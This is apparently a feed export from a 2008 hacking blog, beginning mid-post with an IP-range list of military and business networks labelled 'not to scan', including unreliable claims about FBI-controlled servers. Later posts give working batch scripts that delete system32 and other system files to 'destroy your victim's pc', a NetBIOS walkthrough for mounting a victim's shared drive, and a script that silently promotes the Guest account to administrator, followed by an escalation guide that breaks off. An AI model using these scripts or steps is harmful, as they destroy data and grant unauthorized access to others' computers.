/&gt;204.34.189.0 Defense MegaCenter - St Louis&lt;br /&gt;204.34.190.0 NAVMASSO&lt;br /&gt;204.34.192.0 HQ SOCEUR&lt;br /&gt;204.34.193.0 Second Marine Expeditionary Force&lt;br /&gt;204.34.194.0 Second Marine Expeditionary Force&lt;br /&gt;204.34.195.0 Second Marine Expeditionary Force&lt;br /&gt;204.34.196.0 NAVCOMTELSTAWASHDC&lt;br /&gt;204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER&lt;br /&gt;204.34.198.0 Naval Observatory Detachment, Colorado&lt;br /&gt;204.34.199.0 NAVILCODETMECH&lt;br /&gt;204.34.200.0 Navy Environmental Preventive Medicine&lt;br /&gt;204.34.201.0 Port Hueneme Division, Naval Surf&lt;br /&gt;204.34.202.0 Naval Facilities Engineering Housing&lt;br /&gt;204.34.203.0 NAVSEA Logistics Command Detachment&lt;br /&gt;204.34.204.0 Naval Air Warfare Center&lt;br /&gt;204.34.205.0 Portsmouth Naval Shipyard&lt;br /&gt;204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER&lt;br /&gt;204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific&lt;br /&gt;204.34.211.0 USAF Academy&lt;br /&gt;204.34.212.0 3rd Combat Service Support&lt;br /&gt;204.34.213.0 1st Radio Battalion&lt;br /&gt;204.34.214.0 OASD (Health Affairs)&lt;br /&gt;204.34.215.0 Second Marine Expeditionary Force&lt;br /&gt;204.34.216.0 1st Marine Air Wing&lt;br /&gt;204.34.217.0 SA-ALC/LTE&lt;br /&gt;204.34.218.0 3rd Marine&lt;br /&gt;204.34.219.0 Communications and Electronics&lt;br /&gt;204.34.220.0 G-6 Operations&lt;br /&gt;204.34.221.0 G-6 Operations&lt;br /&gt;204.34.222.0 G-6 Operations&lt;br /&gt;204.34.223.0 G-6 Operations&lt;br /&gt;204.34.224.0 G-6 Operations&lt;br /&gt;204.34.225.0 Joint Interoperability Test Command&lt;br /&gt;204.34.226.0 NAVMASSO&lt;br /&gt;204.34.227.0 NAVMASSO&lt;br /&gt;204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency&lt;br /&gt;204.34.229.0 Naval Space Command&lt;br /&gt;204.34.230.0 Naval Pacific Meteorology and Oceanography&lt;br /&gt;204.34.232.0 Military Family Housing&lt;br /&gt;204.34.233.0 - 204.34.233.255 Navy Material Transportation Office&lt;br /&gt;204.34.234.0 NAVMASSO&lt;br /&gt;204.34.235.0 Defense Finance and Accounting Service&lt;br /&gt;204.34.237.0 European Stars and Stripes&lt;br /&gt;204.34.238.0 Pacific Stars and Stripes&lt;br /&gt;204.34.239.0 PUGET SOUND NAVAL SHIPYARD&lt;br /&gt;204.34.240.0 Nval Station, Guantanamo Bay&lt;br /&gt;204.34.242.0 COMNAVSURFPAC&lt;br /&gt;204.34.243.0 NAVMASSO&lt;br /&gt;204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy&lt;br /&gt;204.34.245.0 USAF SpaceCommand&lt;br /&gt;204.34.246.0 USAF&lt;br /&gt;204.34.247.0 U.S. Army Special Operations Command&lt;br /&gt;204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA&lt;br /&gt;204.34.249.0 Naval Aviation Depot North Island&lt;br /&gt;204.34.250.0 NAVMASSO&lt;br /&gt;204.34.251.0 NAVSEA Log Command Detachment Pacific&lt;br /&gt;204.34.252.0 Command Special Boat Squadron One&lt;br /&gt;204.34.253.0 AFPCA/GNNN&lt;br /&gt;204.34.254.0 Navy Environmental Preventive Medicine&lt;br /&gt;&lt;br /&gt;RANGE 205&lt;br /&gt;205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR&lt;br /&gt;205.96.* - 205.103.*&lt;br /&gt;&lt;br /&gt;RANGE 207&lt;br /&gt;207.30.* Sprint/United Telephone of Florida&lt;br /&gt;&lt;br /&gt;All the below are FBI controlled Linux servers &amp;amp; IPs/IP-Ranges&lt;br /&gt;&lt;br /&gt;207.60.0.0 - 207.60.255.0 The Internet Access Company&lt;br /&gt;207.60.2.128 - 207.60.2.255 Abacus Technology&lt;br /&gt;207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.&lt;br /&gt;207.60.3.128 - 207.60.3.255 Peabody Proberties Inc&lt;br /&gt;207.60.4.0 - 207.60.4.127 Northern Electronics&lt;br /&gt;207.60.4.128 - 207.60.4.255 Posternak, Blankstein &amp;amp; Lund&lt;br /&gt;207.60.5.64 - 207.60.5.127 Woodard &amp;amp; Curran&lt;br /&gt;207.60.5.192 - 207.60.5.255 On Line Services&lt;br /&gt;207.60.6.0 - 207.60.6.63 The 400 Group&lt;br /&gt;207.60.6.64 - 207.60.6.127 RD Hunter and Company&lt;br /&gt;207.60.6.128 - 207.60.6.191 Louis Berger and Associates&lt;br /&gt;207.60.6.192 - 207.60.6.255 Ross-Simons&lt;br /&gt;207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank&lt;br /&gt;207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee&lt;br /&gt;207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc&lt;br /&gt;207.60.8.0 - 207.60.8.255 Sippican&lt;br /&gt;207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co&lt;br /&gt;207.60.9.32 - 207.60.9.63 Escher Group Ltd&lt;br /&gt;207.60.9.64 - 207.60.9.95 West Suburban Elder&lt;br /&gt;207.60.9.96 - 207.60.9.127 Central Bank&lt;br /&gt;207.60.9.128 - 207.60.9.159 Danick Systems&lt;br /&gt;207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO&lt;br /&gt;207.60.9.192 - 207.60.9.223 BSCC&lt;br /&gt;207.60.13.16 - 207.60.13.23 Patrons Insurance Group&lt;br /&gt;207.60.13.40 - 207.60.13.47 Athera Technologies&lt;br /&gt;207.60.13.48 - 207.60.13.55 Service Edge Partners Inc&lt;br /&gt;207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League&lt;br /&gt;207.60.13.64 - 207.60.13.71 SierraCom&lt;br /&gt;207.60.13.72 - 207.60.13.79 AI/ FOCS&lt;br /&gt;207.60.13.80 - 207.60.13.87 Extreme soft&lt;br /&gt;207.60.13.96 - 207.60.13.103 Eaton Seo Corp&lt;br /&gt;207.60.13.112 - 207.60.13.119 C. White&lt;br /&gt;207.60.13.120 - 207.60.13.127 Athera&lt;br /&gt;207.60.13.128 - 207.60.13.135 Entropic Systems, INC&lt;br /&gt;207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates&lt;br /&gt;207.60.13.160 - 207.60.13.167 Jamestown Distribution&lt;br /&gt;207.60.13.168 - 207.60.13.175 C&amp;amp;M Computers&lt;br /&gt;207.60.13.176 - 207.60.13.183 ABC Used Auto Parts&lt;br /&gt;207.60.13.184 - 207.60.13.191 Tomas Weldon&lt;br /&gt;207.60.13.192 - 207.60.13.199 Tage Inns&lt;br /&gt;207.60.13.200 - 207.60.13.207 Control Module Inc&lt;br /&gt;207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems&lt;br /&gt;207.60.13.216 - 207.60.13.223 Eastern Bearings&lt;br /&gt;207.60.13.224 - 207.60.13.231 North Shore Data Services&lt;br /&gt;207.60.13.232 - 207.60.13.239 Mas New Hampshire&lt;br /&gt;207.60.14.0 - 207.60.14.255 J. A. Webster&lt;br /&gt;207.60.15.0 - 207.60.15.127 Trilogic&lt;br /&gt;207.60.16.0 - 207.60.16.255 Area 54&lt;br /&gt;207.60.18.0 - 207.60.18.63 Vested Development Inc&lt;br /&gt;207.60.18.64 - 207.60.18.127 Conventures&lt;br /&gt;207.60.21.0 - 207.60.21.255 Don Law Company&lt;br /&gt;207.60.22.0 - 207.60.22.255 Advanced Microsensors&lt;br /&gt;207.60.28.0 - 207.60.28.63 Applied Business Center&lt;br /&gt;207.60.28.64 - 207.60.28.127 Color and Design Exchange&lt;br /&gt;207.60.36.8 - 207.60.36.15 Shaun McCusker&lt;br /&gt;207.60.36.16 - 207.60.36.23 Town of Framingham&lt;br /&gt;207.60.36.24 - 207.60.36.31 AB Software&lt;br /&gt;207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc&lt;br /&gt;207.60.36.40 - 207.60.36.47 Next Ticketing&lt;br /&gt;207.60.36.48 - 207.60.36.55 Dulsi&lt;br /&gt;207.60.36.56 - 207.60.36.63 The Internet Access Company&lt;br /&gt;207.60.36.64 - 207.60.36.71 Maguire Group&lt;br /&gt;207.60.36.72 - 207.60.36.79 Cogenex&lt;br /&gt;207.60.36.88 - 207.60.36.95 AKNDC&lt;br /&gt;207.60.36.96 - 207.60.36.103 McGovern election commitee&lt;br /&gt;207.60.36.104 - 207.60.36.111 Digital Equipment Corp&lt;br /&gt;207.60.36.112 - 207.60.36.119 PTR - Precision Technologies&lt;br /&gt;207.60.36.120 - 207.60.36.127 Extech&lt;br /&gt;207.60.36.128 - 207.60.36.135 Manfreddi Architects&lt;br /&gt;207.60.36.144 - 207.60.36.151 Parent Naffah&lt;br /&gt;207.60.36.152 - 207.60.36.159 Darling Dolls Inc&lt;br /&gt;207.60.36.160 - 207.60.36.167 Wright Communications&lt;br /&gt;207.60.36.168 - 207.60.36.175 Principle Software&lt;br /&gt;207.60.36.176 - 207.60.36.183 Chris Pet Store&lt;br /&gt;207.60.36.184 - 207.60.36.191 Fifteen Lilies&lt;br /&gt;207.60.36.192 - 207.60.36.199 All-Com Technologies&lt;br /&gt;207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.&lt;br /&gt;207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc&lt;br /&gt;207.60.37.64 - 207.60.37.95 Apple and Eve Distributors&lt;br /&gt;207.60.37.96 - 207.60.37.127 Nelson Copy Supply&lt;br /&gt;207.60.37.128 - 207.60.37.159 Boston Optical Fiber&lt;br /&gt;207.60.37.192 - 207.60.37.223 Fantasia&amp;amp;Company&lt;br /&gt;207.60.41.0 - 207.60.41.255 Infoactive&lt;br /&gt;207.60.48.0 - 207.60.48.255 Curry College&lt;br /&gt;207.60.62.32 - 207.60.62.63 Alternate Power Source&lt;br /&gt;207.60.62.64 - 207.60.62.95 Keystone Howley-White&lt;br /&gt;207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD&lt;br /&gt;207.60.62.160 - 207.60.62.191 County Supply&lt;br /&gt;207.60.62.192 - 207.60.62.223 NH Board of Nursing&lt;br /&gt;207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies&lt;br /&gt;207.60.64.64 - 207.60.64.127 Phytera&lt;br /&gt;207.60.66.0 - 207.60.66.15 The Network Connection&lt;br /&gt;207.60.66.16 - 207.60.66.31 Young Refrigeration&lt;br /&gt;207.60.66.32 - 207.60.66.47 Vision Appraisal Technology&lt;br /&gt;207.60.66.48 - 207.60.66.63 EffNet Inc&lt;br /&gt;207.60.66.64 - 207.60.66.79 Entropic Systems Inc&lt;br /&gt;207.60.66.80 - 207.60.66.95 Finley Properties&lt;br /&gt;207.60.66.96 - 207.60.66.111 Nancy Plowman Associates&lt;br /&gt;207.60.66.112 - 207.60.66.127 Northeast Financial Strategies&lt;br /&gt;207.60.66.128 - 207.60.66.143 Textnology Corp&lt;br /&gt;207.60.66.144 - 207.60.66.159 Groton Neochem LLC&lt;br /&gt;207.60.66.160 - 207.60.66.175 Tab Computers&lt;br /&gt;207.60.66.176 - 207.60.66.191 Patrons Insurance&lt;br /&gt;207.60.66.192 - 207.60.66.207 Chair City Web&lt;br /&gt;207.60.66.208 - 207.60.66.223 Radex, Inc.&lt;br /&gt;207.60.66.224 - 207.60.66.239 Robert Austein&lt;br /&gt;207.60.66.240 - 207.60.66.255 Hologic Inc.&lt;br /&gt;207.60.71.64 - 207.60.71.127 K-Tech International Inc.&lt;br /&gt;207.60.71.128 - 207.60.71.191 Pan Communications&lt;br /&gt;207.60.71.192 - 207.60.71.255 New England College of Finance&lt;br /&gt;207.60.75.128 - 207.60.75.255 Absolve Technology&lt;br /&gt;207.60.78.0 - 207.60.78.127 Extech&lt;br /&gt;207.60.78.128 - 207.60.78.255 The Insight Group&lt;br /&gt;207.60.83.0 - 207.60.83.255 JLM Technologies&lt;br /&gt;207.60.84.0 - 207.60.84.255 Strategic Solutions&lt;br /&gt;207.60.94.0 - 207.60.94.15 McWorks&lt;br /&gt;207.60.94.32 - 207.60.94.47 Rooney RealEstate&lt;br /&gt;207.60.94.48 - 207.60.94.63 Joseph Limo Service&lt;br /&gt;207.60.94.64 - 207.60.94.79 The Portico Group&lt;br /&gt;207.60.94.80 - 207.60.94.95 Event Travel Management Inc&lt;br /&gt;207.60.94.96 - 207.60.94.111 Intellitech International&lt;br /&gt;207.60.94.128 - 207.60.94.143 Orion Partners&lt;br /&gt;207.60.94.144 - 207.60.94.159 Rainbow Software Solution&lt;br /&gt;207.60.94.160 - 207.60.94.175 Grason Stadler Inc&lt;br /&gt;207.60.94.192 - 207.60.94.207 Donnegan System&lt;br /&gt;207.60.95.1 - 207.60.95.255 The Iprax Corp&lt;br /&gt;207.60.102.0 - 207.60.102.63 Coporate IT&lt;br /&gt;207.60.102.64 - 207.60.102.127 Putnam Technologies&lt;br /&gt;207.60.102.128 - 207.60.102.191 Sycamore Networks&lt;br /&gt;207.60.102.192 - 207.60.102.255 Bostek&lt;br /&gt;2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates&lt;br /&gt;207.60.104.128 - 207.60.104.191 Hanson Data Systems&lt;br /&gt;207.60.106.128 - 207.60.106.255 Giganet Inc.&lt;br /&gt;207.60.107.0 - 207.60.107.255 Roll Systems&lt;br /&gt;207.60.108.8 - 207.60.108.15 InternetQA&lt;br /&gt;207.60.111.0 - 207.60.111.31 Reading Cooperative Bank&lt;br /&gt;207.60.111.32 - 207.60.111.63 Edco collaborative&lt;br /&gt;207.60.111.64 - 207.60.111.95 DTC Communications Inc&lt;br /&gt;207.60.111.96 - 207.60.111.127 Mike Line&lt;br /&gt;207.60.111.128 - 207.60.111.159 The Steppingstone Foundation&lt;br /&gt;207.60.111.160 - 207.60.111.191 Caton Connector&lt;br /&gt;207.60.111.192 - 207.60.111.223 Refron&lt;br /&gt;207.60.111.224 - 207.60.111.255 Dolabany Comm Group&lt;br /&gt;207.60.112.0 - 207.60.112.255 The CCS Companies&lt;br /&gt;207.60.116.0 - 207.60.116.255 Continental PET Technologies&lt;br /&gt;207.60.122.16 - 207.60.122.23 Corey &amp;amp; Company Designers Inc&lt;br /&gt;207.60.122.24 - 207.60.122.31 SAIC&lt;br /&gt;207.60.122.32 - 207.60.122.39 Netserve Entertainment Group&lt;br /&gt;207.60.122.40 - 207.60.122.47 Avici Systems Inc&lt;br /&gt;207.60.122.48 - 207.60.122.55 Webrdwne&lt;br /&gt;207.60.122.56 - 207.60.122.63 Reality and Wonder&lt;br /&gt;207.60.122.64 - 207.60.122.71 Nishan Desilva&lt;br /&gt;207.60.122.72 - 207.60.122.79 NemaSoft Inc&lt;br /&gt;207.60.122.80 - 207.60.122.87 Patrick Murphy&lt;br /&gt;207.60.122.88 - 207.60.122.95 Corey and Company&lt;br /&gt;207.60.122.96 - 207.60.122.103 Ames Textile Corp&lt;br /&gt;207.60.122.104 - 207.60.122.111 Publicom&lt;br /&gt;207.60.127.0 - Northstar Technologies&lt;br /&gt;207.60.128.0 - 207.60.128.255 Northstar Technologies&lt;br /&gt;207.60.129.0 - 207.60.129.255 Sanga Corp&lt;br /&gt;207.60.129.64 - 207.60.129.127 Fired Up Network&lt;br /&gt;207.60.129.128 - 207.60.129.191 Integrated Data Solutions&lt;br /&gt;207.60.129.192 - 207.60.129.255 Metanext&lt;br /&gt;207.61.* WorldLinx Telecommunications, Inc., Canada&lt;br /&gt;207.120.* BBN Planet, MA&lt;br /&gt;&lt;br /&gt;RANGE 208&lt;br /&gt;208.240.xxx.xxx&lt;br /&gt;&lt;br /&gt;RANGE 209&lt;br /&gt;209.35.* Interland, Inc., GA&lt;br /&gt;&lt;br /&gt;RANGE 212&lt;br /&gt;212.56.107.22&lt;br /&gt;212.143 *** israelis isp&#39;s!! dont try those ranges!!&lt;br /&gt;212.149.*** israelis isp&#39;s!! dont try those ranges!!&lt;br /&gt;212.159.0.2&lt;br /&gt;212.159.1.1&lt;br /&gt;212.159.1.4&lt;br /&gt;212.159.1.5&lt;br /&gt;212.159.0.2&lt;br /&gt;212.159.1.1&lt;br /&gt;212.159.1.4&lt;br /&gt;212.159.1.5&lt;br /&gt;212.159.33.56&lt;br /&gt;212.159.40.211&lt;br /&gt;212.159.41.173&lt;br /&gt;212.179.*** israelis isp&#39;s!! dont try those ranges!!&lt;br /&gt;212.208.0.12.*** israelis isp&#39;s!! dont try those ranges!!&lt;br /&gt;&lt;br /&gt;RANGE 213&lt;br /&gt;213.8.***.*** israelis isp&#39;s!! dont try those ranges!!&lt;br /&gt;&lt;br /&gt;RANGE 216&lt;br /&gt;216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217&lt;br /&gt;217.6.* Do not scan&lt;/p&gt;&lt;br /&gt;Researched by Blackcoder....</description><link>http://blackcoder-hiren.blogspot.com/2008/02/ips-not-to-scan.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-4347481958348641842</guid><pubDate>Thu, 28 Feb 2008 15:56:00 +0000</pubDate><atom:updated>2008-02-28T07:58:25.929-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Virus And Programming</category><title>Making a Virus to destroy your victim&#39;s pc...</title><description>&lt;h3 class=&quot;smller&quot;&gt;Making a Virus to destroy your victim&#39;s pc...&lt;/h3&gt; &lt;div class=&quot;para&quot;&gt; Hi Guys! I m here explain to make a file that destroys u r victims pc I m not responsible for the damage caused by this file.&lt;br /&gt;1. Open Notepad&lt;br /&gt;&lt;br /&gt;2. write the above command : -del c:\WINDOWS\system32\**/q&lt;br /&gt;&lt;br /&gt;3. Save the above notepad with the extension &quot;.bat or .cmd&quot; as u want[For e.g : File -&gt; Save As -&gt; Type abhi.bat or aaa.cmd&lt;br /&gt;&lt;br /&gt;4. ??????????????? &lt;span style=&quot;font-weight: bold;&quot;&gt;Attention&lt;/span&gt; !!!!!!!!!!!!!!!!&lt;wbr&gt;!!!!!!Don&#39;t double click the file otherwise u r in trouble.&lt;br /&gt;becoz the file u created delete all files from ursystem32 folder and&lt;br /&gt;&lt;br /&gt;when u restart ur pc it will not startbcz system can not find the files in the system32 folder whichis required at the time of booting.&lt;br /&gt;&lt;br /&gt;5. You can also test the above by creating a fake folder let supposewindows1 in C:\.&lt;br /&gt;&lt;br /&gt;Copy some old files in it and just follow theabove command.By double clicking the bat&lt;br /&gt;&lt;br /&gt;or cmd file ur all filesautomaitcally get deleted.6. You can try this file in any one`s&lt;br /&gt;&lt;br /&gt;computer.(but this result in causing damage to the computer, so thik again before&lt;br /&gt;&lt;br /&gt;trying this on anyone&#39;s pc) &lt;/div&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/02/making-virus-to-destroy-your-victims-pc.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-3544597628656703043</guid><pubDate>Thu, 28 Feb 2008 15:51:00 +0000</pubDate><atom:updated>2008-02-28T07:52:42.078-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Let&#39;s Start Hacking</category><title>NetBios hacking for windows 95/98/ME/NT/XP ...</title><description>&lt;h3 class=&quot;smller&quot;&gt;NetBios hacking for windows 95/98/ME/NT/XP&lt;/h3&gt; &lt;div class=&quot;para&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt; Step 1&lt;/span&gt;&lt;br /&gt;Get a IP (range) scanner. (superscanner is a fast one).&lt;br /&gt;Scan the victim&#39;s ip on TCP/IP port 139&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Step 2&lt;/span&gt;&lt;br /&gt;Open a dos prompt&lt;br /&gt;Do this by going to start/run&lt;br /&gt;enter command.com and press ok&lt;br /&gt;&lt;br /&gt;this is what you see:&lt;br /&gt;c:\windows&gt;&lt;br /&gt;&lt;br /&gt;This is what you need to type down:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Replace 255.255.255.255 with the victims IP address.&lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a 255.255.255.255&lt;br /&gt;&lt;br /&gt;If you see this your in:&lt;br /&gt;&lt;br /&gt;NetBIOS Remote Machine Name Table&lt;br /&gt;&lt;br /&gt;Name Type Status&lt;br /&gt;----------------------------------------&lt;wbr&gt;-----------------------&lt;br /&gt;user&lt;00&gt; UNIQUE Registered&lt;br /&gt;workgroup &lt;00&gt; GROUP Registered&lt;br /&gt;user &lt;03&gt; UNIQUE Registered&lt;br /&gt;user &lt;20&gt; UNIQUE Registered&lt;br /&gt;&lt;br /&gt;MAC Address = xx-xx-xx-xx-xx-xx&lt;br /&gt;----------------------------------------&lt;wbr&gt;-----------------------&lt;br /&gt;&lt;br /&gt;If you don&#39;t get the number &lt;20&gt;.&lt;br /&gt;The victim disabled the File And Printer Sharing, find a another victim.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Step 3&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;type down:&lt;br /&gt;&lt;br /&gt;c:\windows&gt;net view \\255.255.255.255&lt;br /&gt;&lt;br /&gt;if the output is like this:&lt;br /&gt;&lt;br /&gt;Shared resources at \\255.255.255.255&lt;br /&gt;ComputerNameGoesHere&lt;br /&gt;&lt;br /&gt;Sharename Type Used as Comment&lt;br /&gt;&lt;br /&gt;----------------------------------------&lt;wbr&gt;--------------------&lt;br /&gt;CDISK Disk xxxxx xxxxx&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The command completed successfully.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&quot;DISK&quot; shows that the victim is sharing a Disk named as CDISK&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Step 4&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;type down:&lt;br /&gt;you can replace x: by anything letter yopu want but not your own drive letters.&lt;br /&gt;CDISK is the name of the shared harddrive.&lt;br /&gt;&lt;br /&gt;c:\windows&gt;net use x: \\255.255.255.255\CDISK&lt;br /&gt;&lt;br /&gt;If the command is successful we will get the confirmation.&lt;br /&gt;The command was completed successfullly&lt;br /&gt;&lt;br /&gt;Now open windows explorer or just double click on the My Computer icon on your&lt;br /&gt;desktop and you will see a new network drive X:\&gt; . Now your are a small time hacker.&lt;br /&gt;Researched By Blackcoder..&lt;br /&gt;&lt;/div&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/02/netbios-hacking-for-windows-9598mentxp.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-3448500392682914439</guid><pubDate>Thu, 28 Feb 2008 15:47:00 +0000</pubDate><atom:updated>2008-02-28T07:50:27.906-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Windows XP Hacking</category><title>Format Your Harddisk With Only Notepad....</title><description>This code just like if u r format ur system .the system will clean&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;&lt;br /&gt;@if exist c:\windows\system32\mouse del c:\windows\system32\mouse&lt;br /&gt;@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard&lt;br /&gt;copy C:\windows\&lt;br /&gt;@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe&lt;br /&gt;@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe&lt;br /&gt;msg &quot;WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:Blackcoder.exe&quot;&lt;br /&gt;&lt;br /&gt;Copy this into a notepad an save as &quot;.bat&quot; or &quot;.exe&quot;&lt;br /&gt;Be Careful With The File.. Please&lt;br /&gt;Enjoy Hacking....</description><link>http://blackcoder-hiren.blogspot.com/2008/02/format-your-harddisk-with-only-notepad.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-64155840438369495</guid><pubDate>Sat, 16 Feb 2008 11:06:00 +0000</pubDate><atom:updated>2008-02-20T09:55:07.343-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Windows XP Hacking</category><title>Hack admin from xp guest account...</title><description>&lt;h1&gt;Hack admin from xp guest account...&lt;/h1&gt;  &lt;!--google_ad_section_end--&gt;&lt;!-- google_ad_section_start --&gt;            &lt;h2&gt;Well thats possible ..&lt;/h2&gt;    &lt;h3&gt;&lt;i&gt;Please Dont missuse This ARTICLE. Its meant for &quot;Educational Purpose&quot; only or for helping those who have lost their PASSWORD.&lt;/i&gt;&lt;/h3&gt;    &lt;h3&gt;Hack &quot;GUEST&quot; with Admin privileges........&lt;/h3&gt; &lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family:Times;font-size:130%;&quot;&gt;&lt;b&gt;echo off&lt;br /&gt;title Please wait...&lt;br /&gt;cls&lt;/b&gt;&lt;br /&gt;&lt;b&gt;net user add Username Password /add&lt;br /&gt;net user localgroup Administrators Username /add&lt;br /&gt;net user Guest 420 /active:yes&lt;br /&gt;net localgroup Guests Guest /DELETE&lt;br /&gt;net localgroup Administrators Guest /add&lt;/b&gt;&lt;br /&gt;&lt;b&gt;del&lt;/b&gt;&lt;b&gt; %0&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Copy this to notepad and save the file as &quot;Guest2admin.bat&quot;&lt;br /&gt;then u can double click the file to execute or run in the cmd.&lt;br /&gt;it works... &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;~ Cheers ~&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family:Impact;font-size:6;&quot;&gt;Haking &quot;admin&quot; from &quot;user&quot; mode n more&lt;/span&gt;&lt;/li&gt;&lt;br /&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h3&gt;  &lt;b&gt;really that is possible !&lt;/b&gt;&lt;/h3&gt;&lt;br /&gt;&lt;b&gt;u know why is it a &quot;user&quot; account because it lacks come service layer than that in &quot;administrator&quot; account&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way: &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;You can trick the system into running a program, script, or batch file with system level privileges.&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;One sample&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;One trick is to use a vulnerability in Windows long filename support.&lt;br /&gt;Try placing an executable named Program.*, in the root directory of the &quot;Windows&quot; drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the &quot;Program Files&quot; directory is a startup app. The call to &quot;Program Files&quot;, will be intercepted by Program.*.&lt;br /&gt;&lt;br /&gt;Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;  &lt;blockquote&gt;  &lt;blockquote&gt;  &lt;blockquote&gt;  &lt;blockquote&gt;  &lt;blockquote&gt;  &lt;b&gt;Quote:&lt;/b&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within. &lt;/b&gt;&lt;br /&gt;&lt;b&gt;Getting SYSTEM &lt;/b&gt;&lt;br /&gt;&lt;b&gt;I will now walk you through the process of obtaining SYSTEM privileges. &lt;/b&gt;&lt;br /&gt;&lt;b&gt;To start, lets open up a command prompt (Start &gt; Run &gt; cmd &gt; 